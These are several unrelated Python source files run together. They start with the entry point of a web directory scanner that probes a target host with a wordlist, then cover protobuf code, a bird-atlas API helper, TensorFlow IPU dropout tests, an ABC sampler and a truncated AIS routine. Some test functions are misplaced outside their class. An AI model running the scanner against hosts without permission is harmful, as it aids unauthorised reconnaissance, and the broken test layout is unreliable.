if __name__=="__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-t", "--target", dest="target",default="",help="specify the target host e.g. http://www.google.de")
parser.add_argument("-f", "--file", dest="file",default="",help="specify the filename with files and directories to scan for")
parser.add_argument("-v", "--verbose",dest="verbose_switch",default=False, action="store_true",help="show all results")
parser.add_argument("-d", "--display",dest="display_list",default=[200],nargs='+', type=int,help="display just certain status codes")
options = parser.parse_args()
if len(sys.argv) < 2:
printhelp()
quit()
else:
target = options.target
file = options.file
verb = options.verbose_switch
filter_list = options.display_list
infoheader()
listtoscan = createlist(file,target)
for scanitem in listtoscan:
scantarget(scanitem,filter_list)
|
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: cs3/ocm/core/v1beta1/resources.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from cs3.types.v1beta1 import types_pb2 as cs3_dot_types_dot_v1beta1_dot_types__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='cs3/ocm/core/v1beta1/resources.proto',
package='cs3.ocm.core.v1beta1',
syntax='proto3',
serialized_options=b'\n\030com.cs3.ocm.core.v1beta1B\016ResourcesProtoP\001Z\013corev1beta1\242\002\003COC\252\002\024Cs3.Ocm.Core.V1Beta1\312\002\024Cs3\\Ocm\\Core\\V1Beta1',
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n$cs3/ocm/core/v1beta1/resources.proto\x12\x14\x63s3.ocm.core.v1beta1\x1a\x1d\x63s3/types/v1beta1/types.proto\"C\n\x08Protocol\x12\x0c\n\x04name\x18\x01 \x01(\t\x12)\n\x06opaque\x18\x02 \x01(\x0b\x32\x19.cs3.types.v1beta1.OpaqueBm\n\x18\x63om.cs3.ocm.core.v1beta1B\x0eResourcesProtoP\x01Z\x0b\x63orev1beta1\xa2\x02\x03\x43OC\xaa\x02\x14\x43s3.Ocm.Core.V1Beta1\xca\x02\x14\x43s3\\Ocm\\Core\\V1Beta1b\x06proto3'
,
dependencies=[cs3_dot_types_dot_v1beta1_dot_types__pb2.DESCRIPTOR,])
_PROTOCOL = _descriptor.Descriptor(
name='Protocol',
full_name='cs3.ocm.core.v1beta1.Protocol',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='cs3.ocm.core.v1beta1.Protocol.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='opaque', full_name='cs3.ocm.core.v1beta1.Protocol.opaque', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=93,
serialized_end=160,
)
_PROTOCOL.fields_by_name['opaque'].message_type = cs3_dot_types_dot_v1beta1_dot_types__pb2._OPAQUE
DESCRIPTOR.message_types_by_name['Protocol'] = _PROTOCOL
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
Protocol = _reflection.GeneratedProtocolMessageType('Protocol', (_message.Message,), {
'DESCRIPTOR' : _PROTOCOL,
'__module__' : 'cs3.ocm.core.v1beta1.resources_pb2'
# @@protoc_insertion_point(class_scope:cs3.ocm.core.v1beta1.Protocol)
})
_sym_db.RegisterMessage(Protocol)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
|
from dataclasses import replace
import atlas.common as common
import json
def observation_coordinates(square_id):
    """Fetch observations for an atlas square from the FinBIF API.

    Returns a tuple of (coordinate string of "[lat,lon],\\n" entries for the
    map, total observation count reported by the API).
    """
    url = f"https://api.laji.fi/v0/warehouse/query/unit/list?selected=gathering.conversions.wgs84CenterPoint.lat%2Cgathering.conversions.wgs84CenterPoint.lon%2Cgathering.coordinatesVerbatim&pageSize=1000&page=1&cache=true&taxonId=MX.37580&useIdentificationAnnotations=true&includeSubTaxa=true&includeNonValidTaxa=true&time=2022%2F2025&individualCountMin=1&coordinates={square_id}%3AYKJ&qualityIssues=NO_ISSUES&atlasClass=MY.atlasClassEnumB%2CMY.atlasClassEnumC%2CMY.atlasClassEnumD&coordinateAccuracyMax=5000&access_token="
    data_dict = common.fetch_finbif_api(url)
    # Todo: skip those with just center coordinates
    # if (isset($obs['gathering']['coordinatesVerbatim'])) {
    rows = []
    for obs in data_dict["results"]:
        point = obs['gathering']['conversions']['wgs84CenterPoint']
        rows.append(f"[{point['lat']},{point['lon']}],\n")
    return "".join(rows), data_dict["total"]
def coordinate_accuracy_html_loop(data):
    """Render accuracy counts as '"<accuracy> m: <count> havaintoa"' pairs,
    comma-separated; empty input yields an empty string."""
    pieces = [
        accuracy + " m: " + str(count) + " havaintoa"
        for accuracy, count in data.items()
    ]
    return ", ".join(pieces)
def coordinate_accuracy_html(data):
    """Build the Finnish HTML summary of observation coordinate accuracies.

    Buckets the raw accuracy counts into five display classes, computes the
    share of observations accurate enough to map (<= 5000 m), and returns a
    single HTML string. With no observations at all, returns a placeholder
    message instead.
    """
    over10000 = data.get("over", 0) + data.get("25000", 0) + data.get("10000", 0)
    under10000 = data.get("5000", 0)
    under1000 = data.get("1000", 0)
    under100 = data.get("100", 0)
    under10 = data.get("10", 0) + data.get("1", 0)
    mappable = under10000 + under1000 + under100 + under10
    total = over10000 + mappable
    if total == 0:
        return "Ruutulta ei ole vielä havaintoja"
    mappable_percentage = round(mappable / total * 100, 1)
    header = f"Kartalla näytetään <strong>{mappable_percentage} %</strong> ruudun <strong>{total} havainnosta</strong>. Havaintojen määrä eri tarkkuusluokissa: "
    buckets = [
        ("yli 10000 m", over10000),
        ("5000 m", under10000),
        ("1000 m", under1000),
        ("100 m", under100),
        ("alle 10 m", under10),
    ]
    return header + ", ".join(
        label + ": <strong>" + str(count) + "</strong>" for label, count in buckets
    )
def main(square_id_untrusted):
    """Assemble the template variables for one atlas square page.

    Validates the caller-supplied square id, gathers neighbour ids,
    observation coordinates, accuracy summary and square metadata, and
    returns everything as a dict keyed for the HTML template.
    """
    square_id = common.valid_square_id(square_id_untrusted)
    neighbour_ids = common.neighbour_ids(square_id)
    coordinates, mappable_obs_count = observation_coordinates(square_id)
    coordinate_accuracy_data, total_obs_count = common.coordinate_accuracy_data(square_id)
    # html["total_obs_count"] = collection_counts(square_id)
    square_name, society, centerpoint, cornerpoints = common.square_info(square_id)
    # Todo: Make heading the same way as on squareform
    return {
        "square_id": square_id,
        "neighbour_ids": neighbour_ids,
        "coordinates": coordinates,
        "mappable_obs_count": mappable_obs_count,
        "accuracies": coordinate_accuracy_html(coordinate_accuracy_data),
        "heading": f"{square_id} {square_name}",
        "centerpoint": centerpoint,
        "cornerpoints": cornerpoints,
    }
|
# Copyright 2021 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
import numpy as np
from tensorflow.compiler.plugin.poplar.tests import test_utils as tu
from tensorflow.python.client import session as sl
from tensorflow.python.data.ops.dataset_ops import Dataset
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gradients_impl
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.training import gradient_descent
from tensorflow.python import ipu
from tensorflow.python.ipu.tests import pipelining_test_util
from tensorflow.compiler.plugin.poplar.ops import gen_poprand_ops
# Call the gen op directly in order to access the seed.
def _dropout(x, noise_shape=None):
  """Apply IPU dropout (rate 0.5, unit scale) via the raw gen op so the
  returned seed output is available to the tests."""
  return gen_poprand_ops.ipu_dropout(
      x, rate=0.5, scale=1.0, noise_shape=noise_shape)
class DropoutTest(test_util.TensorFlowTestCase):
  @tu.test_uses_ipus(num_ipus=8)
  @test_util.deprecated_graph_mode_only
  def testDropoutInPipeline(self):
    """Check dropout seeds inside a 5-stage replicated pipeline.

    Each stage performs a matmul and a dropout and forwards the dropout's
    seed output; the final assertions verify every collected seed differs
    between the two replicas, between consecutive iterations, and between
    repeat counts.
    """
    def dataset_fn():
      dataset = tu.create_single_increasing_dataset(7, shape=[32])
      return dataset.batch(batch_size=32, drop_remainder=True)
    pipeline_depth = 20
    repeat_count = 2
    def stage1(x):
      with variable_scope.variable_scope("vs", use_resource=True):
        weight = variable_scope.get_variable(
            "w0",
            shape=[32, 32],
            dtype=np.float32,
            initializer=init_ops.ones_initializer())
        x = math_ops.matmul(x, weight)
        x, s1, _ = _dropout(x)
      return x, s1
    def stage2(x, s1):
      with variable_scope.variable_scope("vs", use_resource=True):
        weight = variable_scope.get_variable(
            "w1",
            shape=[32, 32],
            dtype=np.float32,
            initializer=init_ops.ones_initializer())
        x = math_ops.matmul(x, weight)
        x, s2, _ = _dropout(x)
      return x, s1, s2
    def stage3(x, s1, s2):
      # Note: this stage applies dropout before the matmul (the other
      # stages do the opposite order).
      with variable_scope.variable_scope("vs", use_resource=True):
        weight = variable_scope.get_variable(
            "w2",
            shape=[32, 32],
            dtype=np.float32,
            initializer=init_ops.ones_initializer())
        x, s3, _ = _dropout(x)
        x = math_ops.matmul(x, weight)
      return x, s1, s2, s3
    def stage4(x, s1, s2, s3):
      with variable_scope.variable_scope("vs", use_resource=True):
        weight = variable_scope.get_variable(
            "w3",
            shape=[32, 32],
            dtype=np.float32,
            initializer=init_ops.ones_initializer())
        x = math_ops.matmul(x, weight)
        x, s4, _ = _dropout(x)
      return x, s1, s2, s3, s4
    def stage5(x, s1, s2, s3, s4):
      with variable_scope.variable_scope("vs", use_resource=True):
        weight = variable_scope.get_variable(
            "w4",
            shape=[32, 32],
            dtype=np.float32,
            initializer=init_ops.ones_initializer())
        x = math_ops.matmul(x, weight)
        _, s5, _ = _dropout(x, noise_shape=[32, 1])
      return s1, s2, s3, s4, s5
    # device_mapping shares device 1 between stages 3 and 5; two replicas, so
    # every collected seed is a per-replica pair.
    output = pipelining_test_util.PipelineTester.pipeline_on_ipu(
        [stage1, stage2, stage3, stage4, stage5],
        lambda: [], [],
        repeat_count,
        pipeline_depth,
        dataset_fn,
        None,
        self,
        10000,
        recomp=False,
        schedule=ipu.pipelining_ops.PipelineSchedule.Grouped,
        device_mapping=[0, 2, 1, 3, 1],
        replication_factor=2)
    s1, s2, s3, s4, s5 = output
    for seeds in (s1, s2, s3, s4, s5):
      assert len(seeds) == pipeline_depth * repeat_count
      for i, s in enumerate(seeds):
        # Make sure the seeds are different between the replicas.
        self.assertNotAllEqual(s[0], s[1])
        # Make sure the seeds between iterations are different.
        # (At i == 0 the negative index wraps to the last element — this
        # still compares two distinct iterations.)
        self.assertNotAllEqual(s, seeds[i - 1])
        # Make sure the seeds are different between repeat counts.
        self.assertNotAllEqual(s, seeds[i - pipeline_depth])
  @tu.test_uses_ipus(num_ipus=1)
  @test_util.deprecated_graph_mode_only
  def testMultipleExecutionsNoUserSeed(self):
    """Without a user seed, two executions of the same dropout op must
    produce different seeds."""
    def model(x):
      # [0:2] keeps the dropout output and its seed, dropping the remaining
      # op output.
      return gen_poprand_ops.ipu_dropout(x, rate=0.5, scale=1.0)[0:2]
    with ops.device('cpu'):
      inp = array_ops.placeholder(np.float32, [2], name="data")
    with ops.device("/device:IPU:0"):
      out = ipu.ipu_compiler.compile(model, [inp])
    cfg = ipu.config.IPUConfig()
    cfg.auto_select_ipus = 1
    tu.add_hw_ci_connection_options(cfg)
    cfg.configure_ipu_system()
    with sl.Session() as sess:
      # Same input twice; only the drawn seed should differ.
      _, s1 = sess.run(out, {inp: [2, 4]})
      _, s2 = sess.run(out, {inp: [2, 4]})
      self.assertNotAllEqual(s1, s2)
  @tu.test_uses_ipus(num_ipus=1)
  @test_util.deprecated_graph_mode_only
  def testMultipleExecutionsUserSeed(self):
    """With an explicit user seed ([10, 10]), repeated executions must
    report the identical seed."""
    def model(x):
      # [0:2] keeps the dropout output and its seed.
      return gen_poprand_ops.ipu_dropout_with_seed(x, [10, 10],
                                                   rate=0.5,
                                                   scale=1.0)[0:2]
    with ops.device('cpu'):
      inp = array_ops.placeholder(np.float32, [2], name="data")
    with ops.device("/device:IPU:0"):
      out = ipu.ipu_compiler.compile(model, [inp])
    cfg = ipu.config.IPUConfig()
    cfg.auto_select_ipus = 1
    tu.add_hw_ci_connection_options(cfg)
    cfg.configure_ipu_system()
    with sl.Session() as sess:
      _, s1 = sess.run(out, {inp: [2, 4]})
      _, s2 = sess.run(out, {inp: [2, 4]})
      self.assertAllEqual(s1, s2)
  @tu.test_uses_ipus(num_ipus=1)
  @test_util.deprecated_graph_mode_only
  def testFwdBwdSeedMatches(self):
    """The backward (gradient) dropout must reuse the forward pass's seed,
    on every execution."""
    def model():
      with variable_scope.variable_scope("vs", use_resource=True):
        w = variable_scope.get_variable(
            "w",
            shape=[2, 4],
            dtype=np.float32,
            initializer=init_ops.ones_initializer())
        loss, s, _ = gen_poprand_ops.ipu_dropout(w, rate=0.5, scale=1.0)
        g = gradients_impl.gradients(loss, [w])
        assert len(g) == 1
        dropout_grad = g[0]
        # The grad is produced by a seeded dropout op; its second output is
        # the seed it used.
        assert dropout_grad.op.type == "IpuDropoutWithSeedAndReference"
        return s, dropout_grad.op.outputs[1]
    with ops.device("/device:IPU:0"):
      out = ipu.ipu_compiler.compile(model, [])
    cfg = ipu.config.IPUConfig()
    cfg.auto_select_ipus = 1
    tu.add_hw_ci_connection_options(cfg)
    cfg.configure_ipu_system()
    with sl.Session() as sess:
      sess.run(variables.global_variables_initializer())
      # Forward and backward seeds must match within each execution.
      s_fwd, s_bwd = sess.run(out)
      self.assertAllEqual(s_fwd, s_bwd)
      s_fwd, s_bwd = sess.run(out)
      self.assertAllEqual(s_fwd, s_bwd)
  @tu.test_uses_ipus(num_ipus=1)
  @test_util.deprecated_graph_mode_only
  def testReuseSequence(self):
    """Dropout inside an outlined (code-reused) function must still draw a
    fresh seed on each call and each loop iteration."""
    outfeed_queue = ipu.ipu_outfeed_queue.IPUOutfeedQueue()
    def inner_loop(x):
      @ipu.outlined_function
      def f(z):
        return gen_poprand_ops.ipu_dropout(z, rate=0.5, scale=1.0)
      # Two calls of the same outlined function per iteration.
      x, s1, _ = f(x)
      x, s2, _ = f(x)
      return x, outfeed_queue.enqueue([s1, s2])
    def model(x):
      return ipu.loops.repeat(10, inner_loop, [x])
    with ops.device('cpu'):
      inp = array_ops.placeholder(np.float32, [2], name="data")
    with ops.device("/device:IPU:0"):
      out = ipu.ipu_compiler.compile(model, [inp])
    cfg = ipu.config.IPUConfig()
    cfg.auto_select_ipus = 1
    tu.add_hw_ci_connection_options(cfg)
    cfg.configure_ipu_system()
    outfeed_op = outfeed_queue.dequeue()
    with sl.Session() as sess:
      sess.run(out, {inp: [2, 4]})
      s1, s2 = sess.run(outfeed_op)
      seeds = list(zip(s1, s2))
      for i, s in enumerate(seeds):
        # Make sure the seeds are not the same between the two executions of
        # the same function within one iteration.
        self.assertNotAllEqual(s[0], s[1])
        # Make sure the seeds between iterations are different.
        # (At i == 0 the negative index wraps to the last iteration.)
        self.assertNotAllEqual(s, seeds[i - 1])
@tu.test_uses_ipus(num_ipus=4)
@test_util.deprecated_graph_mode_only
def testDropoutTrainingInPipeline(self):
  """Training with dropout inside a 2-stage pipeline must reduce the loss."""
  def dataset_fn():
    # Target: a fixed cyclic permutation of the 100 input features.
    transform = np.roll(np.eye(100), 1, 1)
    inputs = np.random.randn(1000, 100) / np.sqrt(100)
    outputs = inputs @ transform
    return Dataset.from_tensor_slices(
        dict(
            inputs=inputs.astype(np.float32),
            outputs=outputs.astype(np.float32),
        )).repeat().batch(32, drop_remainder=True)
  def optimizer_fn():
    return gradient_descent.GradientDescentOptimizer(0.1)
  repeat_count = 32
  pipeline_depth = 32
  def stage1(inputs, outputs):
    N = int(inputs.shape[-1])
    x = inputs @ variable_scope.get_variable(
        "w0",
        shape=(N, N),
        dtype=np.float32,
        initializer=init_ops.zeros_initializer())
    # Dropout with the default rate; seeds are managed by the pipeline.
    x = ipu.rand_ops.dropout(x)
    return x, outputs
  def stage2(inputs, outputs):
    # Mean squared error over the feature axis.
    l = math_ops.reduce_mean(
        math_ops.reduce_sum((outputs - inputs)**2, axis=-1))
    return l
  output = pipelining_test_util.PipelineTester.pipeline_on_ipu(
      [stage1, stage2],
      lambda: [], [],
      repeat_count,
      pipeline_depth,
      dataset_fn,
      optimizer_fn,
      self,
      10000,
      recomp=True,
      device_mapping=[0, 3],  # stages on different IPUs
      schedule=ipu.pipelining_ops.PipelineSchedule.Grouped)
  # The loss must have decreased over training.
  assert output[-1] < output[0]
@tu.test_uses_ipus(num_ipus=4)
@test_util.deprecated_graph_mode_only
def testDropoutTrainingInPipelineHighRate(self):
  """Same as testDropoutTrainingInPipeline but with an aggressive 0.9 rate."""
  def dataset_fn():
    # Target: a fixed cyclic permutation of the 100 input features.
    transform = np.roll(np.eye(100), 1, 1)
    inputs = np.random.randn(1000, 100) / np.sqrt(100)
    outputs = inputs @ transform
    return Dataset.from_tensor_slices(
        dict(
            inputs=inputs.astype(np.float32),
            outputs=outputs.astype(np.float32),
        )).repeat().batch(32, drop_remainder=True)
  def optimizer_fn():
    return gradient_descent.GradientDescentOptimizer(0.1)
  repeat_count = 32
  pipeline_depth = 32
  def stage1(inputs, outputs):
    N = int(inputs.shape[-1])
    x = inputs @ variable_scope.get_variable(
        "w0",
        shape=(N, N),
        dtype=np.float32,
        initializer=init_ops.zeros_initializer())
    # High dropout rate: 90% of activations dropped.
    x = ipu.rand_ops.dropout(x, rate=0.9)
    return x, outputs
  def stage2(inputs, outputs):
    # Mean squared error over the feature axis.
    l = math_ops.reduce_mean(
        math_ops.reduce_sum((outputs - inputs)**2, axis=-1))
    return l
  output = pipelining_test_util.PipelineTester.pipeline_on_ipu(
      [stage1, stage2],
      lambda: [], [],
      repeat_count,
      pipeline_depth,
      dataset_fn,
      optimizer_fn,
      self,
      10000,
      recomp=True,
      device_mapping=[0, 3],  # stages on different IPUs
      schedule=ipu.pipelining_ops.PipelineSchedule.Grouped)
  # The loss must still decrease despite the high dropout rate.
  assert output[-1] < output[0]
@tu.test_uses_ipus(num_ipus=1)
@test_util.deprecated_graph_mode_only
def testDropoutTrainingInPipelineSameDevice(self):
  """Pipeline dropout training with both stages mapped to the same IPU."""
  def dataset_fn():
    # Target: a fixed cyclic permutation of the 100 input features.
    transform = np.roll(np.eye(100), 1, 1)
    inputs = np.random.randn(1000, 100) / np.sqrt(100)
    outputs = inputs @ transform
    return Dataset.from_tensor_slices(
        dict(
            inputs=inputs.astype(np.float32),
            outputs=outputs.astype(np.float32),
        )).repeat().batch(32, drop_remainder=True)
  def optimizer_fn():
    return gradient_descent.GradientDescentOptimizer(0.1)
  repeat_count = 32
  pipeline_depth = 32
  def stage1(inputs, outputs):
    N = int(inputs.shape[-1])
    x = inputs @ variable_scope.get_variable(
        "w0",
        shape=(N, N),
        dtype=np.float32,
        initializer=init_ops.zeros_initializer())
    x = ipu.rand_ops.dropout(x, rate=0.9)
    return x, outputs
  def stage2(inputs, outputs):
    # Mean squared error over the feature axis.
    l = math_ops.reduce_mean(
        math_ops.reduce_sum((outputs - inputs)**2, axis=-1))
    return l
  output = pipelining_test_util.PipelineTester.pipeline_on_ipu(
      [stage1, stage2],
      lambda: [], [],
      repeat_count,
      pipeline_depth,
      dataset_fn,
      optimizer_fn,
      self,
      10000,
      recomp=True,
      device_mapping=[0, 0],  # both stages on the same IPU
      schedule=ipu.pipelining_ops.PipelineSchedule.Grouped)
  # The loss must have decreased over training.
  assert output[-1] < output[0]
# Run the test suite when executed directly.
if __name__ == "__main__":
  googletest.main()
|
#%%
import numpy as np
from itertools import repeat
from itertools import starmap
from scipy.stats import norm
class ABCer:
    """Approximate Bayesian Computation with sequential parameter perturbation.

    ABC-SMC style sampler: each iteration simulates the model for every
    particle, keeps the best-fitting 25%, and perturbs their parameters with
    a Gaussian kernel to propose the next population.
    """

    def __init__(self, iterations, particles, observations):
        # iterations: number of ABC refinement rounds
        # particles: population size per round
        # observations: observed data the simulations are compared against
        self.iterations = iterations
        self.particles = particles
        self.observations = observations

    def initialize_model(self, model):
        # model: callable taking a parameter vector, returning simulated data
        # with the same shape as `observations`.
        self.model = model

    def initialize_parameters(self, paras):
        # paras: template parameter vector (one entry per free parameter).
        self.parameters = paras
        return self.parameters

    def normalized_norm(self, x):
        """Relative distance of each simulation to the observations, scaled to [0, 1]."""
        diff_norm = np.linalg.norm(x / self.observations - 1, axis=1)
        max_err = np.nanmax(diff_norm)
        return diff_norm / max_err

    def purterbation(self, index, weight, para):
        """Resample accepted particles and perturb them with a Gaussian kernel.

        (Name is a typo for "perturbation"; kept for API compatibility.)
        :param index: indices of the accepted (best-fitting) particles.
        :param weight: weights of the full population from the last iteration.
        :param para: parameter values of the full population from the last iteration.
        :return: (normalized weights, proposed parameters) for the next iteration.
        """
        para_last_iteration = para[index]
        weight_update = weight[index] / sum(weight[index])
        # Weighted mean/variance of the accepted sub-population.
        mean_para_last = np.sum(para_last_iteration * weight_update)
        var_para_last = np.sum(
            (para_last_iteration - mean_para_last)**2 * weight_update)
        # Resample accepted indices proportionally to their weights.
        sample_index = np.random.choice(index, self.particles, p=weight_update)
        mean_sample_para = para[sample_index]
        # Perturbation kernel: N(mean, 2 * weighted variance).
        propose_para = np.random.normal(mean_sample_para,
                                        np.sqrt(2 * var_para_last))
        # NOTE(review): searchsorted assumes `index` is sorted; np.where output
        # is sorted, so this holds for calls from ABC().
        evolve_weight = weight_update[index.searchsorted(sample_index)]
        evolve_weight_denominator = np.sum(evolve_weight * norm.pdf(
            propose_para, mean_sample_para, np.sqrt(2 * var_para_last)))
        evolve_weight_numerator = norm.pdf(propose_para, mean_para_last,
                                           np.sqrt(2 * var_para_last))
        evolve_weight = evolve_weight_numerator / evolve_weight_denominator
        evolve_weight = evolve_weight / sum(evolve_weight)
        return evolve_weight, propose_para

    def ABC(self, prior_paras):
        """Run the ABC loop.

        :param prior_paras: flat list of uniform prior bounds, two entries
            (low, high) per parameter.
        :return: dict mapping parameter index -> array of shape
            (iterations + 1, particles) of parameter values, plus key
            'fitness' with the per-iteration fitness matrix.
        """
        # initialize the first iteration
        number_parameters = len(self.parameters)
        if len(prior_paras) != number_parameters * 2:
            # print(...) returns None, so the caller receives None on misuse.
            return print(
                "Provide the corresponding length of the prior information of the parameters!"
            )
        para_each_iteration = np.tile(self.parameters, (self.particles, 1))
        for i in range(number_parameters):
            # Draw the initial population from the uniform priors.
            para_each_iteration[:, i] = np.random.uniform(
                prior_paras[2 * i], prior_paras[2 * i + 1],
                para_each_iteration.shape[0])
        # Store parameter evolution. (dict.fromkeys shares one [] placeholder,
        # but every entry is immediately replaced by its own array below, so
        # no aliasing survives.)
        disct_parameters = dict.fromkeys(range(number_parameters), [])
        for key, value in disct_parameters.items():
            l = np.zeros(shape=(self.iterations + 1, self.particles))
            l[0,:] = para_each_iteration[:,key]
            disct_parameters[key] = l
        # fitness
        fitness = np.zeros(shape=(self.iterations, self.particles))
        # weights: uniform at the start
        disct_parameter_weights = dict.fromkeys(range(number_parameters), [])
        for key, value in disct_parameter_weights.items():
            l = np.zeros(self.particles)
            l.fill(1 / self.particles)
            disct_parameter_weights[key] = l
        for g in range(self.iterations):
            # Simulate the model once per particle.
            packed_para = [[para_each_iteration[i, :]]
                           for i in range(para_each_iteration.shape[0])]
            simulation_each_iter_list = list(starmap(self.model, packed_para))
            distance = self.normalized_norm(simulation_each_iter_list)
            fitness[g, :] = 1 - distance
            q5 = np.argsort(
                fitness[g, :])[-int(self.particles // 4)]  # best 25%
            fit_index = np.where(fitness[g, :] > fitness[g, q5])[0]
            # NOTE(review): this progress print assumes exactly two parameters.
            print('Mean estimates: parameters: %.3e ; %.3e ' %
                  (np.mean(para_each_iteration[fit_index, 0]),
                   np.mean(para_each_iteration[fit_index, 1])))
            for i in range(number_parameters):
                # Perturb each parameter independently to build generation g+1.
                disct_parameter_weights[i], disct_parameters[i][
                    g + 1, :] = self.purterbation(fit_index,
                                                  disct_parameter_weights[i],
                                                  disct_parameters[i][g, :])
                para_each_iteration[:, i] = disct_parameters[i][g+1,:]
        disct_parameters['fitness'] = fitness
        # np.save(output, para_data)
        return disct_parameters
# test
#%%
if __name__ == '__main__':
    import matplotlib.pyplot as plt

    # Example: fit an exponential growth curve y = a * exp(b * t).
    def model_test(para, time_survey=np.arange(18)):
        # time_survey = np.arange(18)
        y = para[0] * np.exp(para[1] * time_survey)
        return y

    y = model_test([1, 2])  # smoke check of the model (result unused)
    observations=np.array([1.0, 7.0,10.0,24.0,38.0,82.0,128.0,188.0,265.0,321.0,382.0,503.0,614.0,804.0,959.0,1135.0,1413.0,1705.0])
    time = np.arange(len(observations))
    test_ABC = ABCer(100, 10000, observations=observations)
    test_ABC.initialize_model(model_test)
    test_ABC.initialize_parameters([0.0, 1.0])
    # Uniform priors: a ~ U(0, 1), b ~ U(1, 2).
    test_list = test_ABC.ABC(prior_paras=[0.0, 1.0, 1.0, 2.0])
    # %%
    plt.plot(time,observations, 'o')
    para_inferred = []
    # Point estimate: population mean at iteration 20 (of 100).
    para_inferred.append(np.mean(test_list[0][20,:]))
    para_inferred.append(np.mean(test_list[1][20,:]))
    # Extrapolate three steps past the observed window.
    extend_time = np.arange(21)
    y_inferred = model_test(para_inferred, np.arange(21))
    plt.plot(extend_time,y_inferred,'x',color = 'r')
    # %%
|
<reponame>wangkua1/BDMC
from __future__ import print_function
import numpy as np
from tqdm import tqdm
import torch
from torch.autograd import grad as torchgrad
from BDMC import hmc
from BDMC import utils
#
import matplotlib.pylab as plt
import torchvision.utils as vutils
import os
def ais_trajectory(model,
                   model_latent_dim,
                   model_decode_vector,
                   loader,
                   forward=True,
                   schedule=np.linspace(0., 1., 500),
                   n_sample=100,
                   log_likelihood_fn=utils.log_bernoulli,
                   log_prior_fn=None,
                   prior_sample_fn=None,
                   save_dir=None):
  """Compute annealed importance sampling trajectories for a batch of data.

  Could be used for *both* forward and reverse chain in BDMC.

  Args:
    model (vae.VAE): VAE model (not called directly here; decoding goes
      through `model_decode_vector`)
    model_latent_dim (int): dimensionality of the latent space
    model_decode_vector (callable): maps a batch of latents z to decoder output
    loader (iterator): iterator that returns pairs, with first component
      being `x`, second would be `z` or label (only used for the reverse chain)
    forward (boolean): indicate forward/backward chain
    schedule (list or 1D np.ndarray): temperature schedule, i.e. `p(z)p(x|z)^t`
    n_sample (int): number of importance samples
    log_likelihood_fn (callable): log p(x|z) from decoder output and data
    log_prior_fn (callable): log p(z); defaults to a standard normal
    prior_sample_fn (callable): draws B prior samples; defaults to standard
      normal on CUDA
    save_dir (str): directory for the periodic reconstruction plots

  Returns:
    A list where each element is a numpy array containing the log importance
    weights for a single batch of data
  """
  if log_prior_fn is None:
    # log_normal with zero mean and zero log-variance == standard normal.
    log_prior_fn = lambda z: utils.log_normal(z, torch.zeros_like(z), torch.zeros_like(z))
  if prior_sample_fn is None:
    prior_sample_fn = lambda B: torch.randn(B, model_latent_dim).cuda()

  def log_f_i(z, data, t):
    """Unnormalized density for intermediate distribution `f_i`:
        f_i = p(z)^(1-t) p(x,z)^(t) = p(z) p(x|z)^t
        => log f_i = log p(z) + t * log p(x|z)
    """
    log_prior = log_prior_fn(z)
    log_likelihood = log_likelihood_fn(model_decode_vector(z), data)
    # mul_ is safe: log_likelihood is freshly computed on every call.
    return log_prior + log_likelihood.mul_(t)

  logws = []
  for i, (batch, post_z) in enumerate(loader):
    # Each datapoint is replicated n_sample times for importance sampling.
    B = batch.size(0) * n_sample
    batch = batch.cuda()
    batch = utils.safe_repeat(batch, n_sample)
    with torch.no_grad():
      epsilon = torch.ones(B).cuda().mul_(0.01)  # per-chain HMC step sizes
      accept_hist = torch.zeros(B).cuda()
      logw = torch.zeros(B).cuda()
    # initial sample of z
    if forward:
      current_z = prior_sample_fn(B)
    else:
      # Reverse chain starts from the given posterior samples.
      current_z = utils.safe_repeat(post_z, n_sample).cuda()
    # current_z = current_z.requires_grad_()
    pbar = tqdm(enumerate(zip(schedule[:-1], schedule[1:]), 1))
    for j, (t0, t1) in pbar:
      current_z = current_z.detach()
      current_z.requires_grad_()
      # Update log importance weight with the ratio f_{t1}/f_{t0}.
      log_int_1 = log_f_i(current_z, batch, t0).detach()
      log_int_2 = log_f_i(current_z, batch, t1).detach()
      logw += log_int_2 - log_int_1
      # resample velocity
      current_v = torch.randn(current_z.size()).cuda()

      def U(z):
        # Potential energy: negative log target density at temperature t1.
        return -log_f_i(z, batch, t1).detach()

      def grad_U(z):
        # grad w.r.t. outputs; mandatory in this case
        grad_outputs = torch.ones(B).cuda()
        # torch.autograd.grad default returns volatile
        # grad = torchgrad(U(z), z, grad_outputs=grad_outputs)[0]
